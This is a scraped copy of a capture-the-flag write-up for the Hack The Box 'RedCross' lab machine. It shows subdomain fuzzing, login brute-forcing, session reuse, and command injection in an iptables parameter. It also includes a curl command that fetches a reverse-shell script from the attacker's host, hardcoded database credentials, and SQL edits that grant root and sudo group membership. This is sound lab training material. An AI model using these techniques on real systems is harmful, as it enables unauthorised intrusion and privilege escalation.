41

Hack The Box - RedCross

 5 years ago
source link: https://www.tuicool.com/articles/hit/BvEnQn6
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

Quick Summary

Hey guys today RedCross retired and here is my write-up about it. To get an initial shell on this box there are two ways , first one is to exploit an authenticated RCE which gives you a shell as www-data , then escalate to root. The second way is to exploit a vulnerable smtp server called Haraka to get a shell as user then escalate to root. Both of the ways were fun and I liked this box. It’s a medium-rated linux box and its ip is 10.10.10.113 I added it to /etc/hosts as redcross.htb . Let’s jump right in !

IzmA7je.png!web

Nmap

As always we will start with nmap to scan for open ports and services :

nmap -sV -sT -sC redcross.htb rey6naI.png!web

Port 22 is open and running ssh , there’s http and https on ports 80 and 443. As always we will check http.

HTTP Initial Enumeration

By going to http://redcross.htb it redirects us to https://intra.redcross.htb

VBj6f2Y.png!web

I added intra.redcross.htb to /etc/hosts next to the ip of the box which is 10.10.10.113

zQrIBba.png!web

Let’s go to intra.redcross.htb again :

jyiq6ji.png!web

Before doing anything I wanted to see if there are any other subdomains , so I used wfuzz with subdomains-top1mil-5000.txt from seclists :

wfuzz -c -w subdomains-top1mil-5000.txt -H "HOST:FUZZ.redcross.htb" https://redcross.htb ZJRJN3j.png!web

Responses for non-existing subdomains are 28 words so I stopped the scan to add --hw 28 to filter these responses :

wfuzz -c -w subdomains-top1mil-5000.txt -H "HOST:FUZZ.redcross.htb" https://redcross.htb zAvYvim.png!web

And we got admin.redcross.htb , So I added it to /etc/hosts :

Zv26nmM.png!web

Note : to enumerate every subdoamin there has to be an entry for that subdomain in /etc/hosts that points to the ip of the box , that’s why I added the HOST HTTP header ( -H "HOST:FUZZ.redcross.htb" ) , it solves the problem.

Now let’s go to admin.redcross.htb and see what’s there :

Avua2y7.png!web

It asks for login , we will get into this later but let’s go back to intra.redcross.htb and see what can we do from there.

jyiq6ji.png!web

We need to login , I tried to bruteforce the login with wfuzz , so I intercepted the request with burp to see the parameters :

aMvaea7.png!web

Then I used wfuzz like we did before (I filtered responses with 32 chars). I used a small list for common credentials like admin:admin , top-usernames-shortlist.txt from seclists.

wfuzz -c --hh 11 -u "https://intra.redcross.htb/pages/actions.php" -X POST -d "user=FUZZ&pass=FUZZ&action=login" -w top-usernames-shortlist.txt 6Jjuqqr.png!web

guest:guest gave us a different response. Let’s try it :

fQ7zYzJ.png!web

And it worked. And we see this message :

From: admin (uid 1)	To: guest (uid 5)

You're granted with a low privilege access while we're processing your credentials request. Our messaging system still in beta status. Please report if you find any incidence.

Broken Session Management , Admin Panel

After some enumeration I found that after being authenticated as guest on intra.redcross.htb you can use the session id on admin.redcross.htb and it will work :

MJzIfie.png!webJf6juiI.png!webAJreyyJ.png!web

Now we have access to the admin panel , there are two areas : User Management and Network Access

User Management :

mui2Avf.png!web

Can we really add users ? Let’s try test :

JBVjiaJ.png!webqAFbyqF.png!web

Nice it gave us the credentials , let’s try ssh :

3IfeMzQ.png!web

And it worked , but it seems like we are not on the actual host , we are in a container or a jail , let’s look at /home :

7jUFfuJ.png!web

interface_data and public ? Last thing I checked was /etc/passwd to know any possible user :

rqeqaym.png!web

There’s a user called penelope , but no /home directory for penelope . So I gave up on this and looked at Network Access :

VzemUf3.png!web

I added my ip address to the whitelist:

3AVzYbr.png!web

Then I scanned the box with nmap again to see if some new ports show up :

mAJ3amu.png!webQRjauan.png!web

there’s ftp on port 21 (anonymous login not allowed), postgresql SQL database on port 5432 and a service on port 1025 but nmap couldn’t really identify it. Now there are two ways to continue , I will show the RCE first.

RCE on admin.redcross.htb , Reverse Shell as www-data

On the Network Access Section you can add and remove ips from the whitelist , I added a random ip , let’s say 11.11.11.11 and intercepted the two requests with burp :

IFbE3iB.png!web

Allow request :

ZZN3emq.png!web

Response :

F3AFZjj.png!web

Deny request :

ERNneqJ.png!web

Response :

QvaAfuF.png!web

We notice that it’s saying Executing iptables , so the ip we provide will be a part of a system command. I added |ls to the ip parameter in the deny request and got this response :

iU7Bfi6.png!webeaaqeuE.png!web

Nice we have an RCE , let’s get a reverse shell , I created a reverse shell and called it shell.sh :

y2Mr2q6.png!web

Then I hosted it on a python simple HTTP server , and downloaded it on the box : curl http://10.10.xx.xx/shell.sh > /tmp/shell.sh

rUriiq3.png!web

Python Server :

FfeAjmJ.png!web

Let’s verify that the shell is on the box :

IjMrimj.png!webRJvAfuz.png!web

Nice let’s execute :

bash /tmp/shell.sh fayqYvy.png!webU7Fju2u.png!web

We got a shell as www-data :

eeuEbua.png!web

And we see in /home a directory for penelope , but we can’t read the user flag.

3IbEz2n.png!web

Hardcoded PostgreSQL Database Credentials , Privilege Escalation to root

In the root directory of the web application , there’s an interseting php file called actions.php . Interesting because it handled everything , we saw it earlier in all the POST requests. I looked into it and found credentials for a db user called unixusrmgr :

buQbYzn.png!web

if($action==='del'){
        header('refresh:1;url=/?page=users');
        $uid=$_POST['uid'];
        $dbconn = pg_connect("host=10.10.10.113 dbname=unix user=unixusrmgr password=dheu%7wjx8B&");
        $result = pg_prepare($dbconn, "q1", "delete from passwd_table where uid = $1");
        $result = pg_execute($dbconn, "q1", array($uid));
        echo "User account deleted";
}

We knew earlier that the database is PostgreSQL , let’s connect :

Some Cheatcheets for PostgreSQL :

Github

postgresqltutorial.com

psql -h 127.0.0.1 -d unix -U unixusrmgr 3EZJryn.png!web

\dt to list the tables :

qeqiyqa.png!web

I did select * from passwd_table; and got some users with their password hashes and other info , so I went back to the admin panel and added a user called rick :

UZNJvir.png!web

Then I did select * from passwd_table; again :

ArQfIn2.png!web

We notice that the homedir is set to /var/jail/home that’s why we can’t access the actual host with created users. Also the gid is set to 1001 . Let’s set that to 0 (root) :

update passwd_table set gid=0 where gid=1001; bi2Irau.png!web

Now the gid is 0 :

ryEbymf.png!web

Let’s also change the homedir :

update passwd_table set homedir='/home' where homedir='/var/jail/home'; VniQjmu.png!webmeUjuuQ.png!web

Let’s login with ssh again :

rmuyiey.png!web

by checking our gid :

UBVfYfU.png!web

It’s root , we still can’t read the flags :

N3aMVfB.png!web

We can’t also sudo :

emEziee.png!web

Weird , I checked /etc/sudoers and saw this line :

qaaiyuv.png!web

If we got the gid of the group sudo , we will be able to run sudo.

cat /etc/group | grep sudo a6N7n2n.png!web

The gid is 27 , let’s return to the database and change our gid from 0 to 27 :

update passwd_table set gid=27 where gid=0; mQFBnuB.png!webselect * from passwd_table; nuyaA3q.png!web

Great , let’s terminate our ssh connection and login again. We are now a member of sudo and we can run sudo , so sudo su will give us a root shell.

2UrIBjV.png!web


report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK